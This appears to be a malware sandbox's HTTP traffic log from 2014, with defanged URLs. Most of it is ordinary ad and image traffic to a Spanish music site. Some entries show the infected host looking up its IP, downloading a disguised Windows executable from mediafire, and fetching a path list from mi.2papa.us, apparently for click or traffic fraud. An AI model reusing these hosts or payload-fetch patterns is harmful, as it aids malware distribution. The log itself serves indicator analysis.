P3P: policyref="hXXp://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: private
Content-Type: text/javascript
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
Server: YTS/1.20.13
0..
GET /small/05/560.png HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: widgets.amung.us
HTTP/1.1 200 OK
Server: nginx/1.2.4
Date: Mon, 21 Apr 2014 11:57:29 GMT
Content-Type: image/png
Content-Length: 330
Last-Modified: Sun, 13 Jun 2010 09:48:29 GMT
Connection: keep-alive
Expires: Wed, 21 May 2014 11:57:29 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GET /swidget/h20d2qja0b7p.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: whos.amung.us
Connection: Keep-Alive
HTTP/1.1 303 See Other
Date: Mon, 21 Apr 2014 11:57:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://widgets.amung.us/small/05/560.png
Set-Cookie: uid=CgH9IFNVB6ljRxZt0akKAg==; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=atta; path=/
0..
GET /st?ad_type=ad&ad_size=300x250&section=5397210 HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ads.yahoo.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 21 Apr 2014 11:57:29 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0801.rm.bf1.yahoo.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: B=7atjd219la1t9&b=3&s=iu; path=/; expires=Thu, 21-Apr-2016 11:57:29 GMT; domain=.yahoo.com
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Mon, 21 Apr 2014 11:57:29 GMT
Expires: Mon, 21 Apr 2014 11:57:29 GMT
Pragma: no-cache
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
<<
<<< skipped >>>
GET /get-user-id?ver=2&s=5397210&ts=1398081449&sig=b42daf690844303b HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ads.yahoo.com
Connection: Keep-Alive
Cookie: B=7atjd219la1t9&b=3&s=iu
HTTP/1.1 200 OK
Date: Mon, 21 Apr 2014 11:57:29 GMT
P3P: policyref="hXXp://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: RMBX=7atjd219la1t9&b=3&s=iu&t=110; path=/; expires=Wed, 20-Apr-2016 11:57:29 GMT
Cache-Control: private
Content-Type: text/javascript
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
Server: YTS/1.20.13
0..
GET /st?ad_type=ad&ad_size=300x250&section=5397210 HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ads.yahoo.com
Connection: Keep-Alive
Cookie: B=7atjd219la1t9&b=3&s=iu; RMBX=7atjd219la1t9&b=3&s=iu&t=110; ih="b!!!!#!L>v#!!!!#>gR*'"; vuday1=IsXSs!6tS(i!$_D; uid=uid=1d62eb12-c94c-11e3-827d-cb8df2a57ad7&_hmacv=1&_salt=1637232578&_keyid=k1&_hmac=87d298b7e64f01dc00e33f6d4df37b9a35caedfa; liday1=iSs5t#Kdr=!6tS($AOnF
HTTP/1.1 200 OK
Date: Mon, 21 Apr 2014 11:57:43 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0230.rm.bf1.yahoo.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Mon, 21 Apr 2014 11:57:43 GMT
Expires: Mon, 21 Apr 2014 11:57:43 GMT
Pragma: no-cache
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
<<
<<< skipped >>>
GET /imp?Z=300x250&s=5397210&_salt=2659402730&B=10&H=&u=http://u.pub-fit.com/2454.html?s=300x250&M=5&r=0 HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ads.yahoo.com
Connection: Keep-Alive
Cookie: B=7atjd219la1t9&b=3&s=iu; RMBX=7atjd219la1t9&b=3&s=iu&t=110; ih="b!!!!#!L>v#!!!!#>gR*'"; vuday1=IsXSs!6tS(i!$_D; uid=uid=1d62eb12-c94c-11e3-827d-cb8df2a57ad7&_hmacv=1&_salt=1637232578&_keyid=k1&_hmac=87d298b7e64f01dc00e33f6d4df37b9a35caedfa; liday1=iSs5t#Kdr=!6tS($AOnF
HTTP/1.1 200 OK
Date: Mon, 21 Apr 2014 11:57:43 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor2111.rm.bf1.yahoo.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: ih="b!!!!$!L>v#!!!!#>gR*'!N94N!!!!#>gR*5"; path=/; expires=Wed, 20-Apr-2016 11:57:43 GMT
Set-Cookie: vuday1=IsXSsIsXSs!6tS(%T)C/; path=/; expires=Tue, 22-Apr-2014 00:00:00 GMT
Set-Cookie: liday1=iSs5t)ghL-1^Rkd#Kdr=!6tS(V!G3c; path=/; expires=Tue, 22-Apr-2014 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Mon, 21 Apr 2014 11:57:43 GMT
Expires: Mon, 21 Apr 2014 11:57:43 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
2cb..document.write('<a target=\"_blank\" href=\"hXXp://ads.yahoo.com/clk?3,eJydjd1qhDAQRp.GOyv5tZHQi7gaka5uKcpuvFNBo5iupVls-.RVVtr7fgwfZ5iBAzFvOp82pAMEM1DjoOaQUEaQj.wGuYBzjnzwGATQB8xt7duU2Lku-8MlVEsotpwusF3EPf1W6Z1f2NaHCGs57mf5enre8V2nRPw.YeyF151X3-rvIybUoIyOy.D3LUqhMhmtznI8njOaJ5nNCjllX3CoivL7WMRLPgqgjJyqpIT5n-DJdbW1s4OFg-Q6N2--NQ.dYL32atYdEUo8bc3kYPnh4AgD8Iko-AGz-l3-,\"><img border=\"0\" alt=\"\" height=\"250\" width=\"300\" src=\"hXXp://content.yieldmanager.edgesuite.net/atoms/c5/f8/76/0e/c5f8760e7af5ff75c20de7295e421a6f.png\"></img></a>');.var rm_data = new Object();.rm_data.creative_id = 25953687;.rm_data.offer_type = 60;.rm_data.entity_id = 985256;..if (window.rm_crex_data) {rm_crex_data.push(25953687);}..0..0......
<<
<<< skipped >>>
GET /imp?Z=300x250&s=5397210&_salt=1531230313&B=10&H=&u=http://u.pub-fit.com/2454.html?s=300x250&M=5&r=0 HTTP/1.1
Accept: */*
Referer: hXXp://u.pub-fit.com/2454.html?s=300x250
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: ads.yahoo.com
Connection: Keep-Alive
Cookie: B=7atjd219la1t9&b=3&s=iu; RMBX=7atjd219la1t9&b=3&s=iu&t=110; ih="b!!!!$!L>v#!!!!#>gR*'!N94N!!!!#>gR*5"; vuday1=IsXSsIsXSs!6tS(%T)C/; uid=uid=1d62eb12-c94c-11e3-827d-cb8df2a57ad7&_hmacv=1&_salt=1637232578&_keyid=k1&_hmac=87d298b7e64f01dc00e33f6d4df37b9a35caedfa; liday1=iSs5t)ghL-1^Rkd#Kdr=!6tS(V!G3c
HTTP/1.1 200 OK
Date: Mon, 21 Apr 2014 11:57:44 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0232.rm.bf1.yahoo.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: ih="b!!!!%!L>v#!!!!#>gR*'!N94=!!!!#>gR*6!N94N!!!!#>gR*5"; path=/; expires=Wed, 20-Apr-2016 11:57:44 GMT
Set-Cookie: vuday1=IsXSsIsXSs!6tS(%T)C/; path=/; expires=Tue, 22-Apr-2014 00:00:00 GMT
Set-Cookie: liday1=iSs5t)ghL.1^Rke#Kdr=!6tS(%ILCn; path=/; expires=Tue, 22-Apr-2014 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Mon, 21 Apr 2014 11:57:44 GMT
Expires: Mon, 21 Apr 2014 11:57:44 GMT
Pragma: no-cache
Content-Type: application/x-javascript
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
2cf..document.write('<a target=\"_blank\" href=\"hXXp://ads.yahoo.com/clk?3,eJydjVFPgzAUhX8Nb0jKbYslZA.toIS4OmNYFN42ZNQKDmMXnL.ekpH9AE9uTr6Te29OiJP2COgQxfesgTfUAk1CQhmBCNi-9VGSJDiOMHM5jv3Gfva5Hfe7bp2LahJ81vY1bCZ-VTdbceUnNvs6xVqaZS2ftw8LfumC8P9LZIE4Lez6XH-XMl5dukFnO3E7SwtQuRxqo.vNi6KPubKqlL26IMe12ZTSVL.yoy45qk0G1XT7XPm-tnb0MPdAujkH4.lwd3y3QXMaXAZCSaDt0HtYfns4xQj9AEV.DWFedw==,\"><img border=\"0\" alt=\"\" height=\"250\" width=\"300\" src=\"hXXp://content.yieldmanager.edgesuite.net/atoms/fa/1b/6b/97/fa1b6b9794e5b240bbad703d9f4c9a12.png\"></img></a>');.var rm_data = new Object();.rm_data.creative_id = 25953670;.rm_data.offer_type = 60;.rm_data.entity_id = 985256;..if (window.rm_crex_data) {rm_crex_data.push(25953670);}..0..0..
<<
<<< skipped >>>
GET /2454.html?s=300x250 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: u.pub-fit.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Last-Modified: Tue, 18 Feb 2014 15:25:43 GMT
ETag: f0908d483f8ef53a51e6767d7fecbe97
X-Trans-Id: tx820f0b51640349af9f524-0053440ed2dfw1
Accept-Ranges: bytes
X-Timestamp: 1392737142.11331
Content-Type: text/html
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 382
Cache-Control: public, max-age=673
Expires: Mon, 21 Apr 2014 12:08:41 GMT
Date: Mon, 21 Apr 2014 11:57:28 GMT
Connection: keep-alive
GET /2454.html?s=300x250 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: u.pub-fit.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Last-Modified: Tue, 18 Feb 2014 15:25:43 GMT
ETag: f0908d483f8ef53a51e6767d7fecbe97
X-Trans-Id: tx820f0b51640349af9f524-0053440ed2dfw1
Accept-Ranges: bytes
X-Timestamp: 1392737142.11331
Content-Type: text/html
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 382
Cache-Control: public, max-age=673
Expires: Mon, 21 Apr 2014 12:08:41 GMT
Date: Mon, 21 Apr 2014 11:57:28 GMT
Connection: keep-alive
<<
<<< skipped >>>
GET / HTTP/1.1
User-Agent: Mozilla/4.0
Host: api.wipmania.com
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 21 Apr 2014 11:57:00 GMT
Content-Type: text/html
Content-Length: 21
Connection: keep-alive
Keep-Alive: timeout=20
193.138.244.231<br>UA
GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: mi.2papa.us
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:26 GMT
Content-Type: text/html
Content-Length: 2723
Last-Modified: Thu, 03 Apr 2014 17:51:39 GMT
Connection: keep-alive
ETag: "533d9fab-aa3"
Accept-Ranges: bytes
<script>.var dominios=[..'/Letra/A/',..'/Letra/B/',..'/Letra/C/',..'/Letra/D/',..'/Letra/E/',..'/Letra/F/',..'/Letra/G/',..'/Letra/H/',..'/Letra/I/',..'/Letra/J/',..'/Letra/K/',..'/Letra/L/',..'/Letra/M/',..'/Letra/N/',..'/Letra/O/',..'/Letra/P/',..'/Letra/Q/',..'/Letra/R/',..'/Letra/S/',..'/Letra/T/',..'/Letra/U/',..'/Letra/V/',..'/Letra/W/',..'/Letra/X/',..'/Letra/Y/',..'/Letra/Z/',....'/Alternativos/',..'/Anime/',..'/Arabe/',..'/Bachatas/',..'/Baladas-de-Oro/',..'/Baladas-Ingles/',..'/Barras/',..'/Billboards/',..'/Boleros/',..'/Brasilenas/',..'/Chicha/',..'/Chistes/',....'/Cristianas/',..'/Cumbia/',..'/Cumbia-Boliviana/',..'/Cumbia-Chilena/',..'/Cumbia-Colombiana/',..'/Cumbia-Ecuatoriana/',..'/Cumbia-Mexicana/',..'/Cumbia-Surena/',..'/Dance/',..'/De-Peliculas/',....'/Discos/',..'/Electronica/',..'/Emo-Punk/',..'/Emo-Screamo/',..'/Flamenco/',..'/Folk/',..'/Gothic/',..'/Hindu/',..'/Hip-Hop/',..'/Huayno/',..'/Infantiles/',....'/Instrumentales/',..'/Japonesas/',..'/Jazz/',..'/Karaoke/',..'/Koreanas/',..'/Latin/',..'/Latinoamericanas/',..'/Merengue/',..'/Metal/',..'/Musica-Clasica/',..'/Musica-Criolla/',....'/Poemas/',..'/Pop-Rock/',..'/Punk/',..'/Rancheras/',..'/Reggae/',..'/Reggaeton/',..'/Ringtones/',..'/Rock-70-80-90/',..'/Rock-Latino/',..'/Romanticas/',..'/Salsa/',....'/Seccion-Djs/',..'/SoundTracks/',..'/Takirari/',..'/Tangos/',..'/Teckno/',..'/Texmex/',..'/Trance/',..'/Trova/',..'/Vallenatos/',..'/Villancicos/',..'/Villeras/',..'/Visual-Kei/',....'/villeras/la-cadiz/',..'/chicha/roy-y-los-gentiles/',
<<
<<< skipped >>>
GET /2454.html?s=300x250 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: u.pub-fit.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Last-Modified: Tue, 18 Feb 2014 15:25:43 GMT
ETag: f0908d483f8ef53a51e6767d7fecbe97
X-Trans-Id: tx820f0b51640349af9f524-0053440ed2dfw1
Accept-Ranges: bytes
X-Timestamp: 1392737142.11331
Content-Type: text/html
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 382
Cache-Control: public, max-age=673
Expires: Mon, 21 Apr 2014 12:08:41 GMT
Date: Mon, 21 Apr 2014 11:57:28 GMT
Connection: keep-alive
<<
<<< skipped >>>
GET /wj53lrzxv7lg/bg4jdeppib94ych/empileque.hfg HTTP/1.1
User-Agent: Mozilla/4.0
Host: download627.mediafire.com
Connection: Keep-Alive
Cookie: ukey=d744vnx8vv7np87ybpq2qnf92ov8hquc
HTTP/1.1 200 OK
Server: LRBD-bigdownload-
Date: Mon, 21 Apr 2014 11:57:18 GMT
Connection: close
Accept-Ranges: bytes
Content-transfer-encoding: binary
Content-Length: 160368
Content-Disposition: attachment; filename="empileque.hfg"
Content-Type: application/x-dosexec
<<
<<< skipped >>>
GET /small/05/567.png HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: widgets.amung.us
HTTP/1.1 200 OK
Server: nginx/1.2.4
Date: Mon, 21 Apr 2014 11:57:47 GMT
Content-Type: image/png
Content-Length: 324
Last-Modified: Sun, 13 Jun 2010 09:48:29 GMT
Connection: keep-alive
Expires: Wed, 21 May 2014 11:57:47 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
GET /Imagenes/i.f06.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:29 GMT
Content-Type: image/gif
Content-Length: 277
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-115"
Accept-Ranges: bytes
GET /Imagenes/i_15.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:29 GMT
Content-Type: image/gif
Content-Length: 156
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-9c"
Accept-Ranges: bytes
GET /Imagenes/i_58.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:30 GMT
Content-Type: image/gif
Content-Length: 228
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-e4"
Accept-Ranges: bytes
GET /Imagenes/lyrics_ico.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:30 GMT
Content-Type: image/gif
Content-Length: 1436
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-59c"
Accept-Ranges: bytes
<<
<<< skipped >>>
GET /Imagenes/videos_ico.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:30 GMT
Content-Type: image/gif
Content-Length: 1522
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-5f2"
Accept-Ranges: bytes
<<
<<< skipped >>>
GET /Imagenes/twitter.png HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:30 GMT
Content-Type: image/png
Content-Length: 608
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-260"
Accept-Ranges: bytes
GET /Imagenes/facebook.png HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:30 GMT
Content-Type: image/png
Content-Length: 502
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-1f6"
Accept-Ranges: bytes
GET /Imagenes/i_02.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:31 GMT
Content-Type: image/gif
Content-Length: 7141
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-1be5"
Accept-Ranges: bytes
<<
<<< skipped >>>
GET /Imagenes/i_08.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:31 GMT
Content-Type: image/gif
Content-Length: 70
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-46"
Accept-Ranges: bytes
GET /Imagenes/-4524f.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:31 GMT
Content-Type: image/gif
Content-Length: 110
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-6e"
Accept-Ranges: bytes
GET /Imagenes/ii_14.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:31 GMT
Content-Type: image/gif
Content-Length: 176
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-b0"
Accept-Ranges: bytes
GET /Imagenes/vineta.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:31 GMT
Content-Type: image/gif
Content-Length: 87
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-57"
Accept-Ranges: bytes
GET /Imagenes/fondo_icos.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:31 GMT
Content-Type: image/gif
Content-Length: 153
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-99"
Accept-Ranges: bytes
GET /static.img/img/i-21.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:32 GMT
Content-Type: image/gif
Content-Length: 63
Last-Modified: Tue, 02 Apr 2013 01:52:41 GMT
Connection: keep-alive
ETag: "515a39e9-3f"
Accept-Ranges: bytes
GET /Imagenes/i_82.gif HTTP/1.1
Accept: */*
Referer: hXXp://esmusicon.com/Poemas/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: esmusicon.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Mon, 21 Apr 2014 11:57:32 GMT
Content-Type: image/gif
Content-Length: 354
